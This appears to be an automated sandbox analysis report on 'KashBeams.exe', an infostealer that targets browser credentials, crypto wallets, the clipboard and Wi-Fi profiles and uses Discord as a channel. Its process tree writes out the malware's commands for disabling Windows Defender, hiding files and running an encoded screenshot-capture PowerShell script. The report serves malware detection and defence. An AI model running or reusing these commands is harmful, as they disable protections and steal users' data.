10bf2019e3d2932957027a5caac24a04424ec014f87e08eefd53ae85176c70e9

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-01-2025 23:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KashBeams.exe
Size

7.5MB
MD5

309098a7fec40953d398abfd44794952
SHA1

031947e64a71a5ff9c5589c6cddcb26742cfd7c6
SHA256

10bf2019e3d2932957027a5caac24a04424ec014f87e08eefd53ae85176c70e9
SHA512

2567ca1482ecf65eb7aab2e50274b87999fc8c5add37fcfc2a259df323a5761178b326dd240e1446a906eb7a8f739dbf0118d61ac72a9f85b78224736523b34f
SSDEEP

196608:7qLjv+bhqNVoBLD7fEXEoYbiIv9pvvk9fIiZ1jT:KL+9qz8LD7fEUbiIqQgpT

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2836	powershell.exe
3076	powershell.exe
2212	powershell.exe
5000	powershell.exe
1376	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	KashBeams.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3972	powershell.exe
3548	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4808	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe
1424	KashBeams.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
220	tasklist.exe
2636	tasklist.exe
1068	tasklist.exe
3444	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3564	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c81-21.dat	upx
behavioral2/memory/1424-25-0x00007FFCC7A80000-0x00007FFCC8150000-memory.dmp	upx
behavioral2/files/0x0007000000023c74-27.dat	upx
behavioral2/memory/1424-30-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp	upx
behavioral2/files/0x0007000000023c7f-31.dat	upx
behavioral2/memory/1424-32-0x00007FFCE0530000-0x00007FFCE053F000-memory.dmp	upx
behavioral2/files/0x0007000000023c7b-48.dat	upx
behavioral2/files/0x0007000000023c7a-47.dat	upx
behavioral2/files/0x0007000000023c79-46.dat	upx
behavioral2/files/0x0007000000023c78-45.dat	upx
behavioral2/files/0x0007000000023c77-44.dat	upx
behavioral2/files/0x0007000000023c76-43.dat	upx
behavioral2/files/0x0007000000023c75-42.dat	upx
behavioral2/files/0x0007000000023c73-41.dat	upx
behavioral2/files/0x0007000000023c86-40.dat	upx
behavioral2/files/0x0007000000023c85-39.dat	upx
behavioral2/files/0x0007000000023c84-38.dat	upx
behavioral2/files/0x0007000000023c80-35.dat	upx
behavioral2/files/0x0007000000023c7e-34.dat	upx
behavioral2/memory/1424-54-0x00007FFCD7990000-0x00007FFCD79BD000-memory.dmp	upx
behavioral2/memory/1424-56-0x00007FFCDE920000-0x00007FFCDE935000-memory.dmp	upx
behavioral2/memory/1424-58-0x00007FFCC7550000-0x00007FFCC7A72000-memory.dmp	upx
behavioral2/memory/1424-60-0x00007FFCDCBA0000-0x00007FFCDCBB9000-memory.dmp	upx
behavioral2/memory/1424-62-0x00007FFCD75F0000-0x00007FFCD7614000-memory.dmp	upx
behavioral2/memory/1424-64-0x00007FFCD6F20000-0x00007FFCD7097000-memory.dmp	upx
behavioral2/memory/1424-66-0x00007FFCDA9E0000-0x00007FFCDA9F9000-memory.dmp	upx
behavioral2/memory/1424-70-0x00007FFCC7A80000-0x00007FFCC8150000-memory.dmp	upx
behavioral2/memory/1424-72-0x00007FFCD6E50000-0x00007FFCD6F1D000-memory.dmp	upx
behavioral2/memory/1424-74-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp	upx
behavioral2/memory/1424-73-0x00007FFCD7570000-0x00007FFCD75A3000-memory.dmp	upx
behavioral2/memory/1424-71-0x00007FFCE0380000-0x00007FFCE038D000-memory.dmp	upx
behavioral2/memory/1424-76-0x00007FFCD7FF0000-0x00007FFCD7FFD000-memory.dmp	upx
behavioral2/memory/1424-80-0x00007FFCD6A70000-0x00007FFCD6B8B000-memory.dmp	upx
behavioral2/memory/1424-128-0x00007FFCC7550000-0x00007FFCC7A72000-memory.dmp	upx
behavioral2/memory/1424-101-0x00007FFCDE920000-0x00007FFCDE935000-memory.dmp	upx
behavioral2/memory/1424-269-0x00007FFCD75F0000-0x00007FFCD7614000-memory.dmp	upx
behavioral2/memory/1424-271-0x00007FFCD6F20000-0x00007FFCD7097000-memory.dmp	upx
behavioral2/memory/1424-288-0x00007FFCD6E50000-0x00007FFCD6F1D000-memory.dmp	upx
behavioral2/memory/1424-309-0x00007FFCD7570000-0x00007FFCD75A3000-memory.dmp	upx
behavioral2/memory/1424-311-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp	upx
behavioral2/memory/1424-315-0x00007FFCC7550000-0x00007FFCC7A72000-memory.dmp	upx
behavioral2/memory/1424-310-0x00007FFCC7A80000-0x00007FFCC8150000-memory.dmp	upx
behavioral2/memory/1424-330-0x00007FFCC7550000-0x00007FFCC7A72000-memory.dmp	upx
behavioral2/memory/1424-351-0x00007FFCD6E50000-0x00007FFCD6F1D000-memory.dmp	upx
behavioral2/memory/1424-350-0x00007FFCE0380000-0x00007FFCE038D000-memory.dmp	upx
behavioral2/memory/1424-349-0x00007FFCDA9E0000-0x00007FFCDA9F9000-memory.dmp	upx
behavioral2/memory/1424-348-0x00007FFCD6F20000-0x00007FFCD7097000-memory.dmp	upx
behavioral2/memory/1424-347-0x00007FFCD75F0000-0x00007FFCD7614000-memory.dmp	upx
behavioral2/memory/1424-346-0x00007FFCDCBA0000-0x00007FFCDCBB9000-memory.dmp	upx
behavioral2/memory/1424-345-0x00007FFCD7FF0000-0x00007FFCD7FFD000-memory.dmp	upx
behavioral2/memory/1424-344-0x00007FFCDE920000-0x00007FFCDE935000-memory.dmp	upx
behavioral2/memory/1424-343-0x00007FFCD7990000-0x00007FFCD79BD000-memory.dmp	upx
behavioral2/memory/1424-342-0x00007FFCE0530000-0x00007FFCE053F000-memory.dmp	upx
behavioral2/memory/1424-341-0x00007FFCDAB90000-0x00007FFCDABB5000-memory.dmp	upx
behavioral2/memory/1424-340-0x00007FFCD7570000-0x00007FFCD75A3000-memory.dmp	upx
behavioral2/memory/1424-339-0x00007FFCD6A70000-0x00007FFCD6B8B000-memory.dmp	upx
behavioral2/memory/1424-325-0x00007FFCC7A80000-0x00007FFCC8150000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2664	cmd.exe
2800	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3452	cmd.exe
2860	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
348	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2456	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133810255243666007"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2800	PING.EXE

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
3076	powershell.exe
3076	powershell.exe
1376	powershell.exe
1376	powershell.exe
2836	powershell.exe
2836	powershell.exe
1376	powershell.exe
1376	powershell.exe
3972	powershell.exe
3972	powershell.exe
1644	powershell.exe
1644	powershell.exe
3076	powershell.exe
3076	powershell.exe
3972	powershell.exe
2836	powershell.exe
1644	powershell.exe
2212	powershell.exe
2212	powershell.exe
3204	powershell.exe
3204	powershell.exe
5000	powershell.exe
5000	powershell.exe
2636	powershell.exe
2636	powershell.exe
4292	chrome.exe
4292	chrome.exe
772	chrome.exe
772	chrome.exe
772	chrome.exe
772	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1556	WMIC.exe
Token: SeSecurityPrivilege	1556	WMIC.exe
Token: SeTakeOwnershipPrivilege	1556	WMIC.exe
Token: SeLoadDriverPrivilege	1556	WMIC.exe
Token: SeSystemProfilePrivilege	1556	WMIC.exe
Token: SeSystemtimePrivilege	1556	WMIC.exe
Token: SeProfSingleProcessPrivilege	1556	WMIC.exe
Token: SeIncBasePriorityPrivilege	1556	WMIC.exe
Token: SeCreatePagefilePrivilege	1556	WMIC.exe
Token: SeBackupPrivilege	1556	WMIC.exe
Token: SeRestorePrivilege	1556	WMIC.exe
Token: SeShutdownPrivilege	1556	WMIC.exe
Token: SeDebugPrivilege	1556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1556	WMIC.exe
Token: SeRemoteShutdownPrivilege	1556	WMIC.exe
Token: SeUndockPrivilege	1556	WMIC.exe
Token: SeManageVolumePrivilege	1556	WMIC.exe
Token: 33	1556	WMIC.exe
Token: 34	1556	WMIC.exe
Token: 35	1556	WMIC.exe
Token: 36	1556	WMIC.exe
Token: SeDebugPrivilege	2636	tasklist.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	220	tasklist.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeIncreaseQuotaPrivilege	1556	WMIC.exe
Token: SeSecurityPrivilege	1556	WMIC.exe
Token: SeTakeOwnershipPrivilege	1556	WMIC.exe
Token: SeLoadDriverPrivilege	1556	WMIC.exe
Token: SeSystemProfilePrivilege	1556	WMIC.exe
Token: SeSystemtimePrivilege	1556	WMIC.exe
Token: SeProfSingleProcessPrivilege	1556	WMIC.exe
Token: SeIncBasePriorityPrivilege	1556	WMIC.exe
Token: SeCreatePagefilePrivilege	1556	WMIC.exe
Token: SeBackupPrivilege	1556	WMIC.exe
Token: SeRestorePrivilege	1556	WMIC.exe
Token: SeShutdownPrivilege	1556	WMIC.exe
Token: SeDebugPrivilege	1556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1556	WMIC.exe
Token: SeRemoteShutdownPrivilege	1556	WMIC.exe
Token: SeUndockPrivilege	1556	WMIC.exe
Token: SeManageVolumePrivilege	1556	WMIC.exe
Token: 33	1556	WMIC.exe
Token: 34	1556	WMIC.exe
Token: 35	1556	WMIC.exe
Token: 36	1556	WMIC.exe
Token: SeDebugPrivilege	1068	tasklist.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	3444	tasklist.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeIncreaseQuotaPrivilege	1972	WMIC.exe
Token: SeSecurityPrivilege	1972	WMIC.exe
Token: SeTakeOwnershipPrivilege	1972	WMIC.exe
Token: SeLoadDriverPrivilege	1972	WMIC.exe
Token: SeSystemProfilePrivilege	1972	WMIC.exe
Token: SeSystemtimePrivilege	1972	WMIC.exe
Token: SeProfSingleProcessPrivilege	1972	WMIC.exe
Token: SeIncBasePriorityPrivilege	1972	WMIC.exe
Token: SeCreatePagefilePrivilege	1972	WMIC.exe
Token: SeBackupPrivilege	1972	WMIC.exe
Token: SeRestorePrivilege	1972	WMIC.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe
4292	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1460 wrote to memory of 1424	1460	KashBeams.exe	85
PID 1460 wrote to memory of 1424	1460	KashBeams.exe	85
PID 1424 wrote to memory of 3464	1424	KashBeams.exe	86
PID 1424 wrote to memory of 3464	1424	KashBeams.exe	86
PID 1424 wrote to memory of 1012	1424	KashBeams.exe	87
PID 1424 wrote to memory of 1012	1424	KashBeams.exe	87
PID 1424 wrote to memory of 3564	1424	KashBeams.exe	88
PID 1424 wrote to memory of 3564	1424	KashBeams.exe	88
PID 1424 wrote to memory of 5092	1424	KashBeams.exe	90
PID 1424 wrote to memory of 5092	1424	KashBeams.exe	90
PID 1424 wrote to memory of 3920	1424	KashBeams.exe	94
PID 1424 wrote to memory of 3920	1424	KashBeams.exe	94
PID 1424 wrote to memory of 3244	1424	KashBeams.exe	95
PID 1424 wrote to memory of 3244	1424	KashBeams.exe	95
PID 1424 wrote to memory of 4648	1424	KashBeams.exe	98
PID 1424 wrote to memory of 4648	1424	KashBeams.exe	98
PID 5092 wrote to memory of 2836	5092	cmd.exe	100
PID 5092 wrote to memory of 2836	5092	cmd.exe	100
PID 1424 wrote to memory of 3548	1424	KashBeams.exe	101
PID 1012 wrote to memory of 1376	1012	cmd.exe	102
PID 1012 wrote to memory of 1376	1012	cmd.exe	102
PID 1424 wrote to memory of 3548	1424	KashBeams.exe	101
PID 1424 wrote to memory of 2864	1424	KashBeams.exe	103
PID 1424 wrote to memory of 2864	1424	KashBeams.exe	103
PID 3920 wrote to memory of 220	3920	cmd.exe	109
PID 3920 wrote to memory of 220	3920	cmd.exe	109
PID 3244 wrote to memory of 2636	3244	cmd.exe	106
PID 3244 wrote to memory of 2636	3244	cmd.exe	106
PID 3464 wrote to memory of 3076	3464	cmd.exe	108
PID 3464 wrote to memory of 3076	3464	cmd.exe	108
PID 3564 wrote to memory of 4832	3564	cmd.exe	105
PID 3564 wrote to memory of 4832	3564	cmd.exe	105
PID 4648 wrote to memory of 1556	4648	cmd.exe	110
PID 4648 wrote to memory of 1556	4648	cmd.exe	110
PID 1424 wrote to memory of 3420	1424	KashBeams.exe	144
PID 1424 wrote to memory of 3420	1424	KashBeams.exe	144
PID 1424 wrote to memory of 3452	1424	KashBeams.exe	112
PID 1424 wrote to memory of 3452	1424	KashBeams.exe	112
PID 1424 wrote to memory of 4696	1424	KashBeams.exe	114
PID 1424 wrote to memory of 4696	1424	KashBeams.exe	114
PID 1424 wrote to memory of 1168	1424	KashBeams.exe	116
PID 1424 wrote to memory of 1168	1424	KashBeams.exe	116
PID 1424 wrote to memory of 1132	1424	KashBeams.exe	117
PID 1424 wrote to memory of 1132	1424	KashBeams.exe	117
PID 2864 wrote to memory of 1068	2864	cmd.exe	122
PID 2864 wrote to memory of 1068	2864	cmd.exe	122
PID 3548 wrote to memory of 3972	3548	cmd.exe	123
PID 3548 wrote to memory of 3972	3548	cmd.exe	123
PID 3420 wrote to memory of 2032	3420	cmd.exe	124
PID 3420 wrote to memory of 2032	3420	cmd.exe	124
PID 3452 wrote to memory of 2860	3452	cmd.exe	125
PID 3452 wrote to memory of 2860	3452	cmd.exe	125
PID 1168 wrote to memory of 412	1168	cmd.exe	143
PID 1168 wrote to memory of 412	1168	cmd.exe	143
PID 1132 wrote to memory of 1644	1132	cmd.exe	127
PID 1132 wrote to memory of 1644	1132	cmd.exe	127
PID 1424 wrote to memory of 3860	1424	KashBeams.exe	128
PID 1424 wrote to memory of 3860	1424	KashBeams.exe	128
PID 1424 wrote to memory of 3160	1424	KashBeams.exe	130
PID 4696 wrote to memory of 2456	4696	cmd.exe	129
PID 1424 wrote to memory of 3160	1424	KashBeams.exe	130
PID 4696 wrote to memory of 2456	4696	cmd.exe	129
PID 3160 wrote to memory of 2876	3160	cmd.exe	133
PID 3160 wrote to memory of 2876	3160	cmd.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4832	attrib.exe
2876	attrib.exe
2520	attrib.exe

C:\Users\Admin\AppData\Local\Temp\KashBeams.exe
"C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1460
- C:\Users\Admin\AppData\Local\Temp\KashBeams.exe
  "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KashBeams.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KashBeams.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3564
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\KashBeams.exe"
      4⤵
      Views/modifies file attributes
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3244
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3420
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3452
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUA